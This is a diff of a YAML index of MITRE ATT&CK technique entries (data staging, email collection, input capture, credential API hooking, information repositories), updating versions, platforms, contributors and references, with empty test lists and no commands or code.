         Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account. This is especially true in cases with hidden auto-forwarding rules. This makes it only possible to reliably detect the existence of a hidden auto-forwarding rule by examining message tracking logs or by using a MAPI editor to notice the modified rule property values.(Citation: Pfammatter - Hidden Inbox Rules)
@@ -41091,16 +41646,17 @@ collection:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Office 365
       - Windows
-      - Google Workspace
       - macOS
       - Linux
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
+      - 'Cloud Service: Cloud Service Metadata'
       type: attack-pattern
       id: attack-pattern--7d77a07d-02fe-4e88-8bd9-e9c008c01bf0
       created: '2020-02-19T18:54:47.103Z'
@@ -41132,70 +41688,66 @@ collection:
         url: https://www.us-cert.gov/ncas/alerts/TA18-086A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1114.003
     atomic_tests: []
   T1074:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - IaaS
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Praetorian
-      - Shane Tully, @securitygypsy
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e
-      created: '2017-05-31T21:30:58.938Z'
-      x_mitre_version: '1.4'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1074
-        url: https://attack.mitre.org/techniques/T1074
-      - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
-        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
-          2020.
-      - source_name: PWC Cloud Hopper April 2017
-        url: https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
-        description: PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved
-          April 5, 2017.
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-09-30T13:28:37.415Z'
+      name: Data Staged
       description: |-
         Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.(Citation: PWC Cloud Hopper April 2017)
 
         In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)
 
         Adversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.
-      modified: '2022-11-08T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Data Staged
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Praetorian
+      - Shane Tully, @securitygypsy
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
 
         Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
 
         Consider monitoring accesses and modifications to storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: collection
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'File: File Access'
       - 'File: File Creation'
       - 'Windows Registry: Windows Registry Key Modification'
       - 'Command: Command Execution'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e
+      created: '2017-05-31T21:30:58.938Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1074
+        external_id: T1074
+      - source_name: Mandiant M-Trends 2020
+        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+          2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+      - source_name: PWC Cloud Hopper April 2017
+        description: PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved
+          April 5, 2017.
+        url: https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1056.002:
     technique:
@@ -41268,7 +41820,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1056.002
     atomic_tests: []
   T1039:
@@ -41323,12 +41874,11 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1039
     atomic_tests: []
   T1114.002:
     technique:
-      modified: '2023-05-31T12:34:03.420Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Email Collection: Remote Email Collection'
       description: Adversaries may target an Exchange server, Office 365, or Google
         Workspace to collect sensitive information. Adversaries may leverage a user's
@@ -41340,6 +41890,9 @@ collection:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: 'Monitor for unusual login activity from unknown or abnormal
         locations, especially for privileged accounts (ex: Exchange administrator
@@ -41347,11 +41900,11 @@ collection:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Office 365
       - Windows
-      - Google Workspace
-      x_mitre_version: '1.2'
+      - Office Suite
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Logon Session: Logon Session Creation'
@@ -41368,14 +41921,11 @@ collection:
         external_id: T1114.002
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1114.002
     atomic_tests: []
   T1056:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-08-13T17:33:45.244Z'
       name: Input Capture
       description: Adversaries may use methods of capturing user input to obtain credentials
         or collect information. During normal system usage, users often provide credentials
@@ -41391,6 +41941,7 @@ collection:
         phase_name: credential-access
       x_mitre_contributors:
       - John Lambert, Microsoft Threat Intelligence Center
+      x_mitre_deprecated: false
       x_mitre_detection: 'Detection may vary depending on how input is captured but
         may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`,
         `GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke),
@@ -41399,13 +41950,13 @@ collection:
         keylogging or API hooking are present.'
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
       - Network
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Process: Process Creation'
@@ -41413,15 +41964,11 @@ collection:
       - 'Process: Process Metadata'
       - 'Process: OS API Execution'
       - 'Driver: Driver Load'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      - root
-      - User
       type: attack-pattern
       id: attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2
       created: '2017-05-31T21:30:48.323Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1056
@@ -41432,9 +41979,60 @@ collection:
         url: http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1213.004:
+    technique:
+      modified: '2024-10-17T14:36:24.983Z'
+      name: Customer Relationship Management Software
+      description: |-
+        Adversaries may leverage Customer Relationship Management (CRM) software to mine valuable information. CRM software is used to assist organizations in tracking and managing customer interactions, as well as storing customer data.
+
+        Once adversaries gain access to a victim organization, they may mine CRM software for customer data. This may include personally identifiable information (PII) such as full names, emails, phone numbers, and addresses, as well as additional details such as purchase histories and IT support interactions. By collecting this data, an adversary may be able to send personalized [Phishing](https://attack.mitre.org/techniques/T1566) emails, engage in SIM swapping, or otherwise target the organization’s customers in ways that enable financial gain or the compromise of additional organizations.(Citation: Bleeping Computer US Cellular Hack 2022)(Citation: Bleeping Computer Mint Mobile Hack 2021)(Citation: Bleeping Computer Bank Hack 2020)
+
+        CRM software may be hosted on-premises or in the cloud. Information stored in these solutions may vary based on the specific instance or environment. Examples of CRM software include Microsoft Dynamics 365, Salesforce, Zoho, Zendesk, and HubSpot.
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Centre for Cybersecurity Belgium (CCB)
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - SaaS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Logon Session: Logon Session Creation'
+      - 'Application Log: Application Log Content'
+      type: attack-pattern
+      id: attack-pattern--bbfbb096-6561-4d7d-aa2c-a5ee8e44c696
+      created: '2024-07-01T20:06:13.664Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1213/004
+        external_id: T1213.004
+      - source_name: Bleeping Computer Bank Hack 2020
+        description: Ionut Ilascu. (2020, January 16). Customer-Owned Bank Informs
+          100k of Breach Exposing Account Balance, PII. Retrieved July 1, 2024.
+        url: https://www.bleepingcomputer.com/news/security/customer-owned-bank-informs-100k-of-breach-exposing-account-balance-pii/
+      - source_name: Bleeping Computer Mint Mobile Hack 2021
+        description: Lawrence Abrams. (2021, July 10). Mint Mobile hit by a data breach
+          after numbers ported, data accessed. Retrieved July 1, 2024.
+        url: https://www.bleepingcomputer.com/news/security/mint-mobile-hit-by-a-data-breach-after-numbers-ported-data-accessed/
+      - source_name: Bleeping Computer US Cellular Hack 2022
+        description: Sergiu Gatlan. (2022, January 4). UScellular discloses data breach
+          after billing system hack. Retrieved July 1, 2024.
+        url: https://www.bleepingcomputer.com/news/security/uscellular-discloses-data-breach-after-billing-system-hack/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1557.002:
     technique:
@@ -41480,7 +42078,7 @@ collection:
         The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)
 
         Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-07-22T18:37:22.176Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: ARP Cache Poisoning
       x_mitre_detection: "Monitor network traffic for unusual ARP traffic, gratuitous
@@ -41499,37 +42097,36 @@ collection:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1213.003:
     technique:
-      modified: '2022-10-18T22:44:01.723Z'
+      modified: '2024-09-04T13:03:54.101Z'
       name: Code Repositories
       description: |-
         Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.
 
-        Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or credentials contained within software's source code.  Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)
+        Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or [Unsecured Credentials](https://attack.mitre.org/techniques/T1552) contained within software's source code.  Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)
 
         **Note:** This is distinct from [Code Repositories](https://attack.mitre.org/techniques/T1593/003), which focuses on conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043) via public code repositories.
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_contributors:
+      - Itamar Mizrahi, Cymptom
+      - Toby Kohlenberg
+      - Josh Liburdi, @jshlbrd
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor access to code repositories, especially performed
         by privileged users such as Active Directory Domain or Enterprise Administrators
         as these types of accounts should generally not be used to access code repositories.
         In environments with high-maturity, it may be possible to leverage User-Behavioral
         Analytics (UBA) platforms to detect and alert on user-based anomalies.
-      x_mitre_platforms:
-      - SaaS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Itamar Mizrahi, Cymptom
-      - Toby Kohlenberg
-      - Josh Liburdi, @jshlbrd
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - SaaS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Logon Session: Logon Session Creation'
@@ -41552,41 +42149,52 @@ collection:
         url: https://krebsonsecurity.com/2013/10/adobe-to-announce-source-code-customer-data-breach/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1213:
     technique:
-      modified: '2024-03-01T16:27:47.391Z'
+      modified: '2024-10-28T19:10:16.960Z'
       name: Data from Information Repositories
       description: "Adversaries may leverage information repositories to mine valuable
         information. Information repositories are tools that allow for storage of
         information, typically to facilitate collaboration or information sharing
         between users, and can store a wide variety of data that may aid adversaries
-        in further objectives, or direct access to the target information. Adversaries
-        may also abuse external sharing features to share sensitive documents with
-        recipients outside of the organization. \n\nThe following is a brief list
-        of example information that may hold potential value to an adversary and may
-        also be found on an information repository:\n\n* Policies, procedures, and
-        standards\n* Physical / logical network diagrams\n* System architecture diagrams\n*
-        Technical system documentation\n* Testing / development credentials\n* Work
-        / project schedules\n* Source code snippets\n* Links to network shares and
-        other internal resources\n\nInformation stored in a repository may vary based
-        on the specific instance or environment. Specific common information repositories
-        include web-based platforms such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002)
-        and [Confluence](https://attack.mitre.org/techniques/T1213/001), specific
-        services such as Code Repositories, IaaS databases, enterprise databases,
-        and other storage infrastructure such as SQL Server."
+        in further objectives, such as Credential Access, Lateral Movement, or Defense
+        Evasion, or direct access to the target information. Adversaries may also
+        abuse external sharing features to share sensitive documents with recipients
+        outside of the organization (i.e., [Transfer Data to Cloud Account](https://attack.mitre.org/techniques/T1537)).
+        \n\nThe following is a brief list of example information that may hold potential
+        value to an adversary and may also be found on an information repository:\n\n*
+        Policies, procedures, and standards\n* Physical / logical network diagrams\n*
+        System architecture diagrams\n* Technical system documentation\n* Testing
+        / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
+        \n* Work / project schedules\n* Source code snippets\n* Links to network shares
+        and other internal resources\n* Contact or other sensitive information about
+        business partners and customers, including personally identifiable information
+        (PII) \n\nInformation stored in a repository may vary based on the specific
+        instance or environment. Specific common information repositories include
+        the following:\n\n* Storage services such as IaaS databases, enterprise databases,
+        and more specialized platforms such as customer relationship management (CRM)
+        databases \n* Collaboration platforms such as SharePoint, Confluence, and
+        code repositories\n* Messaging platforms such as Slack and Microsoft Teams
+        \n\nIn some cases, information repositories have been improperly secured,
+        typically by unintentionally allowing for overly-broad access by all users
+        or even public access to unauthenticated users. This is particularly common
+        with cloud-native or cloud-hosted services, such as AWS Relational Database
+        Service (RDS), Redis, or ElasticSearch.(Citation: Mitiga)(Citation: TrendMicro
+        Exposed Redis 2020)(Citation: Cybernews Reuters Leak 2022)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
       x_mitre_contributors:
-      - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
       - Regina Elwell
       - Praetorian
       - Milos Stojadinovic
       - Isif Ibrahima, Mandiant
+      - Obsidian Security
+      - Naveen Vijayaraghavan
+      - Nilesh Dherange (Gurucul)
       x_mitre_deprecated: false
       x_mitre_detection: "As information repositories generally have a considerably
         large user base, detection of malicious use can be non-trivial. At minimum,
@@ -41615,10 +42223,9 @@ collection:
       - Windows
       - macOS
       - SaaS
-      - Office 365
-      - Google Workspace
       - IaaS
-      x_mitre_version: '3.3'
+      - Office Suite
+      x_mitre_version: '3.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
@@ -41631,10 +42238,20 @@ collection:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1213
         external_id: T1213
+      - source_name: Mitiga
+        description: Ariel Szarf, Doron Karmi, and Lionel Saposnik. (n.d.). Oops,
+          I Leaked It Again — How Mitiga Found PII in Exposed Amazon RDS Snapshots.
+          Retrieved September 24, 2024.
+        url: https://www.mitiga.io/blog/how-mitiga-found-pii-in-exposed-amazon-rds-snapshots
       - source_name: Atlassian Confluence Logging
         description: Atlassian. (2018, January 9). How to Enable User Access Logging.
           Retrieved April 4, 2018.
         url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
+      - source_name: TrendMicro Exposed Redis 2020
+        description: David Fiser and Jaromir Horejsi. (2020, April 21). Exposed Redis
+          Instances Abused for Remote Code Execution, Cryptocurrency Mining. Retrieved
+          September 25, 2024.
+        url: https://www.trendmicro.com/en_us/research/20/d/exposed-redis-instances-abused-for-remote-code-execution-cryptocurrency-mining.html
       - source_name: Microsoft SharePoint Logging
         description: Microsoft. (2017, July 19). Configure audit settings for a site
           collection. Retrieved April 4, 2018.
@@ -41643,11 +42260,14 @@ collection:
         description: Microsoft. (n.d.). Sharepoint Sharing Events. Retrieved October
           8, 2021.
         url: https://docs.microsoft.com/en-us/microsoft-365/compliance/use-sharing-auditing?view=o365-worldwide#sharepoint-sharing-events
+      - source_name: Cybernews Reuters Leak 2022
+        description: Vilius Petkauskas . (2022, November 3). Thomson Reuters collected
+          and leaked at least 3TB of sensitive data. Retrieved September 25, 2024.
+        url: https://cybernews.com/security/thomson-reuters-leaked-terabytes-sensitive-data/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1602.001:
     technique:
@@ -41684,7 +42304,7 @@ collection:
         description: Cisco. (2008, June 10). Identifying and Mitigating Exploitation
           of the SNMP Version 3 Authentication Vulnerabilities. Retrieved October
           19, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T01:54:22.812Z'
       name: SNMP (MIB Dump)
       description: "Adversaries may target the Management Information Base (MIB) to
         collect and/or mine valuable information in a network managed using Simple
@@ -41716,115 +42336,182 @@ collection:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1056.004:
     technique:
-      x_mitre_platforms:
-      - Windows
+      modified: '2024-08-27T21:03:56.385Z'
+      name: 'Input Capture: Credential API Hooking'
+      description: |
+        Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001),  this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
+
+        * **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)
+        * **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+        * **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
+
+        Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
+
+        Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
       x_mitre_domains:
       - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
+      x_mitre_data_sources:
+      - 'Process: Process Metadata'
+      - 'Process: OS API Execution'
       type: attack-pattern
+      id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
       created: '2020-02-11T19:01:15.930Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1056.004
         url: https://attack.mitre.org/techniques/T1056/004
+        external_id: T1056.004
+      - source_name: EyeofRa Detecting Hooking June 2017
+        description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
+          against user-land. Retrieved December 12, 2017.'
+        url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
+      - source_name: Zairon Hooking Dec 2006
+        description: Felici, M. (2006, December 6). Any application-defined hook procedure
+          on my machine?. Retrieved December 12, 2017.
+        url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
+      - source_name: GMER Rootkits
+        description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
+        url: http://www.gmer.net/
+      - source_name: MWRInfoSecurity Dynamic Hooking 2015
+        description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
+          Mode. Retrieved December 20, 2017.'
+        url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
+      - source_name: Elastic Process Injection July 2017
+        description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
+          A Technical Survey Of Common And Trending Process Injection Techniques.
+          Retrieved December 7, 2017.'
+        url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
+      - source_name: HighTech Bridge Inline Hooking Sept 2011
+        description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+          December 12, 2017.
+        url: https://www.exploit-db.com/docs/17802.pdf
       - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
         description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
           Retrieved December 18, 2017.
         url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
-      - url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+      - source_name: Microsoft Hook Overview
         description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
-        source_name: Microsoft Hook Overview
-      - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
-        description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
-          A Technical Survey Of Common And Trending Process Injection Techniques.
-          Retrieved December 7, 2017.'
-        source_name: Elastic Process Injection July 2017
-      - url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
-        description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
-          Retrieved December 12, 2017.'
-        source_name: Adlice Software IAT Hooks Oct 2014
-      - url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
-        description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
-          Mode. Retrieved December 20, 2017.'
-        source_name: MWRInfoSecurity Dynamic Hooking 2015
-      - url: https://www.exploit-db.com/docs/17802.pdf
-        description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+        url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+      - source_name: Microsoft Process Snapshot
+        description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
           December 12, 2017.
-        source_name: HighTech Bridge Inline Hooking Sept 2011
-      - url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
-        description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
-          Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
-        source_name: Volatility Detecting Hooks Sept 2012
-      - url: https://github.com/prekageo/winhook
+        url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
+      - source_name: PreKageo Winhook Jul 2011
         description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
-        source_name: PreKageo Winhook Jul 2011
-      - url: https://github.com/jay/gethooks
+        url: https://github.com/prekageo/winhook
+      - source_name: Jay GetHooks Sept 2011
         description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
           12, 2017.
-        source_name: Jay GetHooks Sept 2011
-      - url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
-        description: Felici, M. (2006, December 6). Any application-defined hook procedure
